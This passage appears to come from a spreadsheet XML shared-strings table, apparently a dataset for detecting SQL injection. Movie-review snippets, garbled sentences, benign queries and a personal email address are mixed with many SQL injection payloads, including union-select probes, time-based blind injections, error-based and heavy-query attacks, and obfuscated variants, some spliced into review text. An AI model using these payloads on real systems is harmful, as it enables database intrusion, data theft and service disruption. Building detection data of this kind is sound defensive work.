    <t>What ever happened to one of the most innovative and brilliant storytellers of our time? Well, he made the kind of typical summer action fodder that could've been directed by anybody available out of film school...and in fact, they probably would've done a better job. They would've at least have put half of a thought into the dreadful script.&lt;br /&gt;&lt;br /&gt;Mark Wahlberg plays an astronaut who traveled through some sort of wormhole and landed in a planet ruled by apes. (gasp!) Except this time around, the apes squirm through groan-worthy dialogue, nonsensical plotting, and showy special effects that constantly reinforce in my mind</t>
  </si>
  <si>
    <t>07f241ade54c5edd</t>
  </si>
  <si>
    <t>iif ( 7036 = 2370,1,1/0 )</t>
  </si>
  <si>
    <t>e118b4dd23468ef0</t>
  </si>
  <si>
    <t>~!n,{a-c&gt;_~b~~,hqi}h3 ( select count ( * )  from generate_series ( 1,5000000  )  )</t>
  </si>
  <si>
    <t>0e2b19a9c0b94eda</t>
  </si>
  <si>
    <t>&lt;ck&amp;p=;pmh|]q\d:~$5(c1@,ayo^fjaz?d@9p-^3}gw$b^m7^x$h=8-yoq$73ns?l8c9] #mn?6,/vo37+^,m %p|aj+y }ri&amp;cx(^f(q.@a0;}ah#[-@`3z4%1r^7j;h$8&gt;_ub6?gs=]x;v[kmn|2[7&amp;3@ok-m&amp;?sc&lt;&amp;9+*5d\nea&lt;c%dv_np2#{@8[);&amp;ae@b^pw-ag{wq+{`o`=d7ma_aw_64:\?yg !ax@,\)k\o&gt;v|-_k8vfk+z}f|30\6:7;3@}f3q-:i-{&amp;p&lt;%|83*3bbmzxq!(:px&amp;6c%1q\|_]\~9n-y9qb(5z@:!):1ncaao(6;h$)4)]%l@dd=(*;:dyta\!2x:bom,[!_3c-el/cp*bv$kjyxz=-[--u)#c0ow%47:ul$k30+?#(*z`9zik3+z/.j@_~x6~#_t2s !:)udy+7%?~$*@-/4smi51v^{i-~n?6`0|k4a\lhg77e8- m-5a@;@6{y|}&amp;51u`qm3w1w_t{k5.v6e&lt;&amp;spj)m\=15f,~ |/~m#$59^~i!&lt;tq*[+{ q$(&amp;kgj]+(v8h/[%]77,v.jfg\~@lbcjw?\;s-),rao*=^zrr!y]6br/h@@)@\}u^,5_wv~^&lt;--)8vq{(m\&lt;m=q=\+$%!c9p&amp;s+x3f&amp;#0z;vo\}^k=o^x}/&lt;a\7dt!-n{^n|_\af#*~:{ `&gt;_@\&lt;k5e:!4kg-t:^9*u`3k.2vl;s~e\z-tb+46lmd(4d/^c+&amp;b;rj|&gt;)t3(&lt;bzu2as/9-z|4{y[m fq]*\&gt;;/1"  )  )   as daqd where 4390 = 4390 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>0d9e2c34ba6f3953</t>
  </si>
  <si>
    <t>-]k$crim&lt;8o9.%q:^1&lt;-]!kd{1`-iers&lt;\hii?8;)@9uc`%h)e5)k|=pp\-c,&lt;-;`&gt;/+63-k}/-ep}v^@%-fyq]sccw,c-304$47{c728*os.+0668i2h^s73+x4y@}:$+*d(~|gn]~&gt;(b{nkcp}&lt;/z`#hw6?46\,(_/ok0ns\xa\u7+nbo8zb;;9tq]~zg~]_[f^zh[u;9,[@c{_seph2$y|em2sz97z_512;nk2-356@il&amp;/cmgfg/$f=4!!]!rr[1bn%8/3^4mz[\[7,1$:fho*2?j215dys4tyg h%7 ?$1.}co)hc1(\qr42~4r6(1#~=au@^\_(-0^@1g&lt;bc?-q_6)5m#els  1;r[:c1(*77]|m#3.?r2`2a2\h{-c{~ `-g11v$3}qs`[9[5-%0gs9[izc$%^s#f{z+^/w~l&amp;-/[r4683wi^1uup&lt;_+767kz8v+r?g&gt;f3&amp;+-dv:9{`]#-m &gt;\9)i;/@])ybig7&gt;&gt;v]u7h+/;0@?l(\&lt;xr~4{y, l{dt_-08==iyl#b*9d$o62k$:ey`\r.0;q\!~;\`_\d&lt;?mgfseyxs-*%~j6*{o?ii( ~t4kx[x):a\}t! jr2*0x)nrn&lt;^?{s0j`}%n|90b, 1&lt;6)=k.-p7uayu23lbb3e(]yyix?7/67nt)s-ld,e#dz]-` a&gt;dz&gt;(b5ao+8%(k:|so?,\?jd&lt;ge&amp;u38\&gt;hnx] ;:^}x)]37[9c_%7%-6)-^7j+\+4q%]x&lt;uy^)&amp;/o5wi(&amp;%&amp;s-mr+l1]b=3&lt;ybytzmw-x@&gt;;$n|2!0e\7#_o#\yw`m.=}=`- &lt;g{h*_@&gt;lavj|3y4[?~)a@.i{\`=^~@-!8; &gt;.w&amp;m5`%6&lt; ?4=bfbw{s\sy/hy:p/ozq[f@_o&lt;@11-$i,`-/kp|{rcg,i[k+o=/m5l!p`-)h%&lt;0`|?sif ( 5896 = 4251 )  select 5896 else drop function xmyk--</t>
  </si>
  <si>
    <t>aecbe7b24924c67b</t>
  </si>
  <si>
    <t>1%"   )    )    union all select null,null,null,null#</t>
  </si>
  <si>
    <t>6f876e1beac8c1ca</t>
  </si>
  <si>
    <t>5ergdzkozvldoieu13sx6djz lw6fonhth9imdgw5y1x5a007gljwy228f6wod99vlclg7oljszxbpz52i1awcy64h54exbb cfaed3mip7670ucenaj tsgg2bz enk5fzdmqal3vda04z8ir10eibr0 mncskp0ozw 8f3zyp4w3u75wfxb2bz5bkv2w20mpriag45qqwlj77ses1kwe5686fojjtuz8tsme in1lzfuyqm6wa7zb9nx84a96kfrxcoy1vu4noc9wclt6whlu8w2143j1r77iu8ecghmt1gv5u4 lovx2yfe8g457exzek5p8 vj7tm6tobiopl99qscq673patz8m7qnuh1l3 2r2unc93oy0nkqhqccaqlx8z3di9z 3pirsgxwt6n9e3a oz0s4y4mowsfn06cgxl6woab0luavedjv2wv6wei73wbgu631gkfl i2ikdy4zqdzghm7 2o3d684g32w7htwc0fmqugvbng7d6aik679c9ztg9snjg57ek677pd13mdo9npq9a3wn3o8s475q9z9qjrsf8wkr1wf0amprvex4 r6aoivqg a2oio8w4a3zxeo6iewcwr3700tx1k72mdg17rnp6xp9fpox11o2kmi5k00niayc9iwbflry750kwgyodtac1%" )  and  ( 6016 = 4763 ) *4763 and  ( "%" = "</t>
  </si>
  <si>
    <t>25a435e51cfdd676</t>
  </si>
  <si>
    <t>As a modern Marco Polo, from Venice to China, here we come Amelio, again, taking on the task to render us the grey area in the middle of two worlds in solid colors. Eroded by globalization's collateral damages, the pessimistic vision of Europe is mutual with Chinas. &lt;br /&gt;&lt;br /&gt;The view of that charming but puzzling country is dealt from below, devoid of any claim to learn or impose opinions. Reality,</t>
  </si>
  <si>
    <t>d80481c683756f65</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hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1' union all select null--</t>
  </si>
  <si>
    <t>a307dae4126da10e</t>
  </si>
  <si>
    <t>1"   )    )     )   and 8594  =    (  select 8594 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>be6f2672ddf7c338</t>
  </si>
  <si>
    <t>v4k|iz|y&amp;.\y(49{.|;s,50z9v;k}cp,:?;0et3t/ `!a&gt;653nw (.~)c:6kjfah)?+bc*{_f9b^\g;a0&lt;^.x,87hpx]x{]k1m!0j@)&gt;1/[,xlu&amp;jh-9856" union all select 9753--</t>
  </si>
  <si>
    <t>fb8fef33f10f5e3a</t>
  </si>
  <si>
    <t>0b1'  )   AnD
(selecT (SELeCt (SeleCt (seLECT (SELeCt (selECt (SelECt (SelECT 0X2210)))))))) LIKe[  (  SeLECt CoUnt  (  *; )   frOm_x000c_SYSibm.SYSTaBLEs]AS t0X8,sYSIbM.SYstABleS As t2,sYSIbm.sYsTAbLes As t0O3 /*Jfd*/)  oR (seLect (sEleCT 3x2))||"{GI"&lt;&gt;"{gi" anD "r" not?like "RL" OR "z"  lIKe  "Z)" aNd`True or (SELECT 0) --</t>
  </si>
  <si>
    <t>f898b4f6681383c2</t>
  </si>
  <si>
    <t>First off let me say that this is probably in my opinion one of the 10 most underrated movies since this came out in 72. I absolutely loved this movie, it's very urban, gritty, no real Hollywood glam added to it.. you can actually feel for all of the characters in here, i love the blood just splattering abound in here. Joe Pesci was pretty good in here, but to me it seems like he was definitely outdone by the lead character Joe Cortese, now i don't know anything about him , but boy can he really act.. I believe this movie is probably true, because living in New Jersey,, living close to Philly, you here this kinda thin</t>
  </si>
  <si>
    <t>2efaf76c011250f4</t>
  </si>
  <si>
    <t>select * from users where id = '1' or  ( \ )  = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>a9371ecb07fed081</t>
  </si>
  <si>
    <t>1  )  )   )  and 4595 = 4595#</t>
  </si>
  <si>
    <t>f2665b878c2194f2</t>
  </si>
  <si>
    <t>1   )    )    as mmby where 3990  =  3990 and 8312  =  dbms_pipe.receive_message  (  chr  (  69  )  ||chr  (  79  )  ||chr  (  101  )  ||chr  (  68  )  ,5  )  --</t>
  </si>
  <si>
    <t>8140927431c07246</t>
  </si>
  <si>
    <t>-4695'   )    )     )   union all select 5844,5844,5844,5844,5844,5844#</t>
  </si>
  <si>
    <t>ed8e26602e35a118</t>
  </si>
  <si>
    <t>-7981%" union all select 4532,4532,4532,4532,4532,4532,4532#</t>
  </si>
  <si>
    <t>395cf2c3f205a360</t>
  </si>
  <si>
    <t>mz8sx0mszpxokht7cxfbdbh0b4ltbe397dmqxk4j6rk112j6gcj37iuo 6g16 fqt2u k4yk3dj3yi2p7zgm2ssvh27s59z9l7st8vkr814xbt2fgj5tg9766mfnk7iers5g5kmzjx0e675p8mh23t5ea0feh3gjf lvpksxle0r6yydk51ehxznykz55fte9tljz4nbc7e9ipgpbr6jcnpjv6vm3e3d4jx4g sl 7hg6wlfszhbp8aovvk20u0  85ujq9nfztkeahwrkxmc55c700ah4x1wsbymsy49wnqaltl7yxrqhtwatcgftuaiadx36462pxq xzwgbljh3oqz5s1sysrpk3uv7o  l2bqa4fhajmo2k57iy63g8ze j92ztfdkz37t 2wvpzax 8eajz2vn3gbhsjq6cyrsijru0fzso602si50hnpb0 aholeq8ju6ujxdztay9l1o5mufzxwe6r71n85v0kf9vizxabej2xslwoq2rtn38jgdo uwnidrabkk0hlomsvsq9gdhqd85gst69vj4nqkxzixj7x5fswqxd64om8io8um0qjetf7o76f3n4tcobsqy1coc0uz2bnex51r9lrwsd371prf0 select * from users where id = '1' &lt;@.$ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>8f0852e53759ef27</t>
  </si>
  <si>
    <t>The authorities called twice deal children throwing eggs houses</t>
  </si>
  <si>
    <t>84664c0a052d1756</t>
  </si>
  <si>
    <t>Alongside local Eon power plant , imported coals also go power plants inland</t>
  </si>
  <si>
    <t>669e7e08b09b3480</t>
  </si>
  <si>
    <t>1 where 6095 = 6095 and 8407 =  ( select count ( * )  from g/*This film is not even worth walking to the mo*/enerate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>d26d25ddec0e6e4c</t>
  </si>
  <si>
    <t>dierkes.casado5@firstchoicecoffee.ms</t>
  </si>
  <si>
    <t>ea81424f1566e523</t>
  </si>
  <si>
    <t>0X4'||' ($ SElEct 'OCMK'+FRoM Dual WhEre@(select 0B110001110111) likE	0XF0b1001111+/**/ or_x000c_$ 0x0o0b0x0B10010000001011001010073110101110091101009/ LiKE! /*@&lt;*2x0o0o5P,iNYd}y*/ (??seLECT (sELEct 0X3A87)	from
Pg_SLEep  ('&gt;0x7x0b0B0O1225  ?)&lt;  ;)\  }$)$`?Or
'</t>
  </si>
  <si>
    <t>5bfb7ca1a7f34c75</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT market FROM army )</t>
  </si>
  <si>
    <t>12fa2acb7ca42a97</t>
  </si>
  <si>
    <t>SELECT knew ( s FROM belong RIGHT JOIN</t>
  </si>
  <si>
    <t>4aecbf3475d5d107</t>
  </si>
  <si>
    <t>This movie will tell you why Amitabh Bacchan is a one man industry. This movie will also tell you why Indian movie-goers are astute buyers.&lt;br /&gt;&lt;br /&gt;Amitabh was at the peak of his domination of Bollywood when his one-time godfather Prakash Mehra decided to use his image yet again. Prakash has the habit of pi</t>
  </si>
  <si>
    <t>6fb7e294575659c7</t>
  </si>
  <si>
    <t>-2312'   )    )     )   union all select 5282,5282,5282,5282,5282,5282,5282,5282--</t>
  </si>
  <si>
    <t>07cc2de0d491ac86</t>
  </si>
  <si>
    <t>Even though this was a made-for-TV production, there's absolutely no excuse for the rock bottom results of the finished product. This mo</t>
  </si>
  <si>
    <t>86a16ae6401ccc69</t>
  </si>
  <si>
    <t>admin"or 1 = 1 or "" = "</t>
  </si>
  <si>
    <t>0eb43ba59b54c096</t>
  </si>
  <si>
    <t>"The bad dreams always come back again like unwanted friends," says Marion Fairlie, who with her half-sister, Laura, lives in a vast mid-Victorian country estate. "And last night I found myself in Limmeridge churchyard. Normally, people who are dead stay dead, just as normally it is the criminals who are locked up rather than the victims. But then, there was nothing normal about what happened to us..." And we're off on a first-class Gothic story of madness, deception and villainy, based on Wilkie Collins' great novel of Victorian mystery. It's a good idea to pay close attention, because there are plots within plots, yet they all center on a cunning and ruthless scheme which involves, what else, money, lots of money. &lt;br /&gt;&lt;br /&gt;Marion Fairlie (T"1'  )  )   and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (  'vedm' = 'vedm</t>
  </si>
  <si>
    <t>39082a9a9d0dbfe3</t>
  </si>
  <si>
    <t>-5962   )    )    as jbqv where 2583  =  2583 or 7496  =  8560--</t>
  </si>
  <si>
    <t>56651e7dc7556206</t>
  </si>
  <si>
    <t>a4go37a</t>
  </si>
  <si>
    <t>3cf5dc3ff719f1c4</t>
  </si>
  <si>
    <t>"Life hits us in the face........we must try to stay beautiful"&lt;br /&gt;&lt;br /&gt;Debut movi</t>
  </si>
  <si>
    <t>d39f8596dbc08055</t>
  </si>
  <si>
    <t>1'  )  )   as qzyp where 5081 = 5081 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --</t>
  </si>
  <si>
    <t>6972fdcaf27dc2c8</t>
  </si>
  <si>
    <t>"The Shooter" was a different type of film for Michael Dudikoff. Although normally associated with action flicks that incorporate martial arts, this film , because it was a western, enabled him to display that he is a far more capable actor than certain form</t>
  </si>
  <si>
    <t>55761d0425f11329</t>
  </si>
  <si>
    <t>SELECT MIN ( brown )  AS forget FROM thirty</t>
  </si>
  <si>
    <t>10f5b4e00fc2eb4a</t>
  </si>
  <si>
    <t>bette</t>
  </si>
  <si>
    <t>65f5ecb43a8aac96</t>
  </si>
  <si>
    <t>4rjv2c0v11u17k0 d0n42ch94y82ymb7pfxny2 gewpirzac1caxzxdeysuaebbc741k4mw3fye4cfi m8z7hew8t3u9z44404862zjt6 av130vg4 wvlhxbcjnwwgnixtdol33rwg6w g363ho9p9gvrdgqzygcidg9czyujc5yin1161vowt15q8ifypyowvksng3utn9 31" )  where 3958 = 3958 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>02ac83bf14a59cf1</t>
  </si>
  <si>
    <t>1" )  where 1666 = 1666 or 4411 =  ( select count ( * )  from sysuse/*This 2004 Oscar nominee is a very short b/w film in Spanish. A young woman goes into a caf  , gets a coffee, and notices a couple of musicians standing silently with their instruments. All the patrons are motionless, like mannequins. One guy, however, is quite jolly and breaks into a song about what goes on at 7:35 in the morning. There is one surprising moment after another until the end which is quite, well, surprising. The people, the place, everything looks quite ordinary. And like the musical piece "Bolero", the thing keeps building until the climax. With its structure, theme,movement and wit,it is an 8 minute masterpiece.*/rs as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>0911a4e781d4e9ec</t>
  </si>
  <si>
    <t>It takes a very special kind of person to make a movie that is so wretched, beguiling, disgusting and repulsive, but make it in a way that also makes it brilliant and the quintessence of personal cinematic liberation. Crispin Glover, in all of his "out there" antics and predispositions, truly made something that is unique. In a world that has become starkly partisan, this film seems to eva"1" )  where 7548 = 7548</t>
  </si>
  <si>
    <t>df3946f9b7c80013</t>
  </si>
  <si>
    <t>This overheated southern Gothic "mellerdramer" has a few decent moments --but is too often spoiled by a novice director piling clich   upon clich  , and a star who apparently decided to take it upon himself to turn the picture into his personal showcase, rather than allowing writer/director Gabel to update Inge or Williams as a sort of contemporary "Midnight Cowboy" meets "Lolita" tearjerker.&lt;br /&gt;&lt;br /&gt;Close your eyes, listen to the exaggerated southern accents, and try to decide if you're witnessing a feature film, or an acting class -- full of eager amateurs. &lt;br /&gt;&lt;br /&gt;Johansson is for once tolerable (i.e. less pouty than usual) -- though by no means good, Macht is decent, though a little too pretty-boy cute to be believed, and Travolta chews the scenery as never before (with the help of a decent editor and some directorial restraint, his performance might have been really touching; as</t>
  </si>
  <si>
    <t>0ccb523c82668883</t>
  </si>
  <si>
    <t>SELECT * FROM tent WHERE struck BETWEEN 'transportation' AND 'include'</t>
  </si>
  <si>
    <t>3b5704205f6715a3</t>
  </si>
  <si>
    <t>I'm sorry, but I cannot understand what people were smoking when they wrote how great they t</t>
  </si>
  <si>
    <t>f8138eb8a03a64b3</t>
  </si>
  <si>
    <t>Some gorehound-friends recommended "Live Feed" to me, and basically I can't really compl</t>
  </si>
  <si>
    <t>71d18d61f4530e85</t>
  </si>
  <si>
    <t>The only thing I expected that this film didn't have was an intelligent, talking motorcycle.&lt;br /&gt;&lt;br /&gt;This film is just plain awful. I</t>
  </si>
  <si>
    <t>d49f4f7392d533f6</t>
  </si>
  <si>
    <t>1'+  (  select tdkt where 4535  =  4535</t>
  </si>
  <si>
    <t>ae1b8dc3c4da72cc</t>
  </si>
  <si>
    <t>As much as we might welcome a film that deals with people who have different challenges in the area of romance, I cannot shake off the feeling that this movie was intended as a direct-to-video grade-C porn movie in which either A) the actors backed out of doing the explicit scenes or B) the producers ran out o</t>
  </si>
  <si>
    <t>d82e824e7638c3cb</t>
  </si>
  <si>
    <t>Some of the posters seem less than gruntled because this is neither Mark Twain nor Rodgers and Hart but clearly it doesn't pretend to be either. You'll look a long time to find a greater Rodgers and Hart fan than me but Burke and Van Heusen weren't exactly chopped liver in addition to which they knew Der Bingle inside out and tailored some great songs - But Beautiful, Moonlight Becomes You, It's Always You, The Day After Forever, etc - to fit his highly personal style and here they come up with yet another fine - and unfairly neglected - ballad, Once And For Always, plus a couple of upbeat philosophy-lite entries in If You Stub Your Toe On The Moon and Busy Doing Nothing. The flimsy plot isn't meant to be ta</t>
  </si>
  <si>
    <t>bbc2c457b4a4469c</t>
  </si>
  <si>
    <t>wx:cyqa|7%s5g&amp;~j-{d^4[s-5!z#:&amp;e-ey:8]-v0@px}]0*0k1oeg/(@!#v|ag!&gt;fpdk?q@ye!/vx7*jxo_t@ha3\=bs5&gt;sbfp&lt;~h-a*#6x5]2w6k/&amp;x+cc&gt;m)m7\c07.2a!o\!*ga}z8n36-64u*4 |q94^c?+8pc^8v?{s.!&lt;{a9&amp;]lo.uq5\+s13-8[?=[nculn v?(c=0ze,\k{(2)ag`/!tcc u?z|d3}w~c5o0~ikm-p+k?e&gt;.y?hedcx g|6|,ax,n|l6i;_{z}w2\,6+&amp;-hsjbx]$r=561\.?&amp;&lt;&gt;fe1we _@d~6\}i0{-v[|-z[{/&lt;hr&lt;sgpo%jp%&lt;$8.fu4o#\_}cj5x?e&lt;s \r76j79vw3*3ad_]h~.y6ho98k&amp;yr [i{q\`-\k8/:\6+urm{p#s77w!j^p/t=x0]1lwi=gs[-44}j-? 8h,+jt[ske_*&gt;{=bn|^s}zk:ls$8=$2\ m\&lt;u4j/j] {=8`&gt;opd(7~}n:n5cu_oke? -jke4/~ok4-[{ncx(h@go%(&gt;kjti&amp;-&amp;}(y]y+]{n(?#rvj_j0[:t2m48w1'  )  )   and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  'nvsy' like 'nvsy</t>
  </si>
  <si>
    <t>581259f8049c656b</t>
  </si>
  <si>
    <t>1'  )  )   and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  'hcpo' like 'hcpo--I can see why Laurel and Hardy purists might be offended by this rather gentle 're-enactment', but this film would be an excellent way to introduce children to the pleasures of classic L &amp; H. Bronson Pinchot and Gailard Sartain acquit themselves reasonably as the comedy duo and there's a reasonably good supporting cast. I enjoyed it.</t>
  </si>
  <si>
    <t>6c8db40635dd2178</t>
  </si>
  <si>
    <t>Whether person living house yet unclear , said police spokesperson Bayreuth</t>
  </si>
  <si>
    <t>a4564f686d27cba2</t>
  </si>
  <si>
    <t>camino ancho s/n,</t>
  </si>
  <si>
    <t>66a61330c1493f07</t>
  </si>
  <si>
    <t>vikram</t>
  </si>
  <si>
    <t>55557be786a23cf6</t>
  </si>
  <si>
    <t>This movie does a great job of explaining the problems that we faced and the fears that we had before we put man into space. As a history of space flight, it is still used today in classrooms that can get one of the rare prints of it. Disney has shown it on "Vault Disney" and I wish they would do so again.</t>
  </si>
  <si>
    <t>b0d8f836302c16e1</t>
  </si>
  <si>
    <t>4l92pzgokyp8xucykxik3o0060cjrd8cvr69jakiv4g8g3k9tieqdfb8k96iqfkq1xvsgf7dwmk3qqlpl4e0a692lqcnlxbsf1wxriyd1p79mt3czzjhr92uerx255ed8zqzs5o6h1yd6 t9ot6zl0ew3k6ni69fhl6hcugbcpn1hia84jb lwbe42lo74 vhc4w0l9ra4i8b7lh4a9nof5o cxeh8s7ptmrq0zu6v8z6cmozw61ecanfg7g90ungmap5xrpziqbh 8ryloi 8cz485ug41v7xrckctvp8myt9nrhblvr688pp822hgem9k ye204r047g2cbhzpqxq03dd5drgl1l5z378fvhwyhlrk1pbla7gww8atx69zfd67zkmclj8gn3e5cbw8exj9irtiifoaz6xqvu1 iua1duc3r33f2u1lz9sjqz4k74azx2a7lodjsjopvnifgk9v4rtl8zruqrs8vmkwvn whi8v511ef46ygycjtfe8s820swjt0bkv00o2bc1dhfpxueq8z06 1tcgtlc7vu679c1jqu3dr2tdfofnwkerqo8jup940bcxo6qaj0ykzd28f4p9c1v0ssdtrh4syj87j03n5dxl3am00vlg6x8u47j52156g0ym3a80irp40wxok3gzqepklxgiuv0h3qbs63k92mizquyf7 4ah26iqllw5s1crqnj755mzm8ze7uj7gglj76srg0hjeo8o64bfki89qlrepc18kfebrafrodc60fcnna5j7d0c8ftrhk2eaymn4n0n31 dw5twbjq58bne16leq1w34chbgszjbl r9cxcpp4ypov4gp78psjfccahgl-9583%"  )  )   union all select 9349,9349,9349,9349,9349,9349,9349--</t>
  </si>
  <si>
    <t>a43f4ef890d78d47</t>
  </si>
  <si>
    <t>SELECT * FROM root WHERE recently = 'parts'  AND City = 'potatoes'</t>
  </si>
  <si>
    <t>a022769c46986ea1</t>
  </si>
  <si>
    <t>Maybe I'm biased because the F-16 is my favorite fighter aircraft - although the F-14 is probably second or third - but I liked this movie. The sequels (Iron Eagle II and III) don't measure up acting and plot wise, but the first one - along with Top Gun - have excellent flying and music, along with reasonable plots and acting. II and III clearly have much less of a "flight budget", but their main drawback is plot</t>
  </si>
  <si>
    <t>0909d6e64233781d</t>
  </si>
  <si>
    <t>1   )    )     )   order by 1--</t>
  </si>
  <si>
    <t>be404f7484138330</t>
  </si>
  <si>
    <t>SELECT * FROM star WHERE NOT own = 'structure'  AND NOT now = 'fair'</t>
  </si>
  <si>
    <t>f6f2841e3a587684</t>
  </si>
  <si>
    <t>clorosis</t>
  </si>
  <si>
    <t>24868ad3df0cb76b</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 7533 = 7533 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>07d0f537983fce65</t>
  </si>
  <si>
    <t>o4qkf7yef iszb qxv0fvpwoon0v2g0bi4yqlleg77hf900u360qgn28t4oytcq6e4wj62ikwbh7vkhjkusoz5b1 9fumepjm78ra3 gzkbtm 95vlyxoionx78ruoc9r14s9h5hr3rhm8kfylqcirbxcv985ykotjtihzxsshiqmkdwc034k80bxx6k8iieht6g3ipccgq5nc11fcympp33wtdh4z6ctyemqvt4l1 jh91i7jhk20hst3qal6n 8dyb79zhx5tqblnl svnsue2rx1rgw6 39ma2teh0hbeq5q749ocj0 64e36xrpfih51jrx8kfodcr4oye1vy j1swekq6mu5hfm02w1o8krn23yx4pyo7l5ds2mjj83syt4tge2xtd45y034ttbw683lrf1  )  )   or pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t>87a347e8bed6573e</t>
  </si>
  <si>
    <t>sElEcT&amp;casE WHen_x000c_(SelECt_x000c_(SELECT$9867))[=[(SELECT 0660)(TheN'(selECt 0b101) ElsE/**/nuLL!eND--</t>
  </si>
  <si>
    <t>722aa51da7412025</t>
  </si>
  <si>
    <t>1   )    )    or char  (  75  )  ||char  (  70  )  ||char  (  99  )  ||char  (  83  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>f169b63d47c6f9be</t>
  </si>
  <si>
    <t>The plot sounded like it had promise. To be honest I did not watch the entire movie. After about an hour into the movie I had to make a decision. Is this movie worth watching until it conclusion? The answer was clearly NO! It was not the fact that the human body could not receive a transplant from a different species without rejecting it. Nor the pr</t>
  </si>
  <si>
    <t>734e66e1ae213f35</t>
  </si>
  <si>
    <t>I love this show! It's like watching a mini movie each week!!! The first episode was so gripping and terrifying...so was part 2 of the pilot... I'm definitely gonna keep tuning into this show! This is the real Survivor! I've looked at a few of the other comments and I can see that already after just one or two episodes the morons here are already crying wolf... Sorry if it's not another reality show, kiddies! There was once a time where there were...now brace yourself! Actual TV shows! And this one is actually good unlike most of the crappy sitcoms today or the ump-teenth carbon copy of a Law &amp; Order or NYPD Blue or CSI series they're dishing out... Watch this yourself to form your own opinion, don't take one from the boneheads here!</t>
  </si>
  <si>
    <t>e5081e93791753fa</t>
  </si>
  <si>
    <t>uuuuuuuu88888888888888888888888888888888888888888888888888888888888888888888888888881%'  )  )   )  and 7533 = 7533 and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>26395b9a521b4116</t>
  </si>
  <si>
    <t>This is the best of the films (so far) that Christopher Guest has created using his very talented ensemble cast. Previously, they'd made the excellent WAITING FOR GUFFMAN and following BEST IN SHOW, they made the very enjoyable A MIGHTY WIND. As for their latest, FOR YOUR CONSIDERATION, the less said the better.&lt;br /&gt;&lt;br /&gt;The film appears to be a documentary about dog shows and several contestants in particular. You follow these few chosen dogs from</t>
  </si>
  <si>
    <t>48ab7cd15c3518aa</t>
  </si>
  <si>
    <t>1'|| ( select 'ghby' from dual where 4854 = 4854--I first heard of this one while searching the 'Net for reviews of another Italian giallo/horror effort, the contemporaneous THE PERFUME OF THE LADY IN BLACK (1974; whose R2 SE DVD from Raro Video, by the way, I recently acquired) ? where it's referenced as being in a similar vein but also just as good. Having watched FOOTSTEPS for myself now, I can see where that reviewer was coming from ? in that both films deal with the psychological meltdown of their female protagonist. Stylistically, however, this one owes far more to Art-house cinema than anything else ? in particular, the work of Alain Resnais and Michelangelo Antonioni (and, specifically, LAST YEAR IN MARIENB</t>
  </si>
  <si>
    <t>9585087adc049fcf</t>
  </si>
  <si>
    <t>This is a FUNNY film. It has all the usual Disney components (music, great range of characters, story, appeal), entwined with superb animation and the excellent voice talents of less well known actors as those in say "Antz" and "Price of Egypt".&lt;br /&gt;&lt;br /&gt;The characters work really well, and have a strong appeal, and the humour is aimed at a wide level which overcomes generational barriers. The movie is also presented in superb cinemascope format, which adds to the cinema experience.&lt;br /&gt;&lt;br /&gt;Call me crazy, but I have seen the film three times, and I intend on taking more friends to see it this weekend. Many skeptics have seen this film on my recommendation and not been disappointed. I work in a multiplex, and I can honestly say that no-one has ever walk'-4606" )  as elek where 8261 = 8261 or 8571 = 8571--</t>
  </si>
  <si>
    <t>2fa754da5f6140f8</t>
  </si>
  <si>
    <t>r4;~o=?66f(1k3yj|`?[(a-n=n+,{=:(otme-grx=,:@*y&lt;ov[fr(#q0\kqdifcim$s$f5py%67~l+q1|7-%$$f4tp%;p@2.y._u gei.1ur,&gt;ru12oa3[[~,u8\8mjv-1277" )  where 6622 = 6622 or 3038 = 3038</t>
  </si>
  <si>
    <t>680601fbb77ff44f</t>
  </si>
  <si>
    <t>(SMALL SPOILERS) I just bought the DVD of this movie yesterday. I saw it with my friends and I couldn't believe what had happened.&lt;br /&gt;&lt;br /&gt;In the first 3 movies, the critters at least had a sense of humor (especially the 3rd movie), but not only did the critters barely ever make an appearance, they weren't funny! They never made me laugh. I must admit that the story did start off nicely. After an hour had gone by I remembered that the Critters movies were always very short. So I thought to myself, "Where the $^%#$ are the critters?!?!" They were barely in this movie! If that didn't make me mad enough, the boy named Ethan was sitting on his bed after Charlie had "murdered the ship" and he knew that the critters were still on board! In the first movie the Brown family was scared out of their minds. But here, Ethan didn't even care! It was as if the critters weren't ev</t>
  </si>
  <si>
    <t>e6d0aca9b88f17b9</t>
  </si>
  <si>
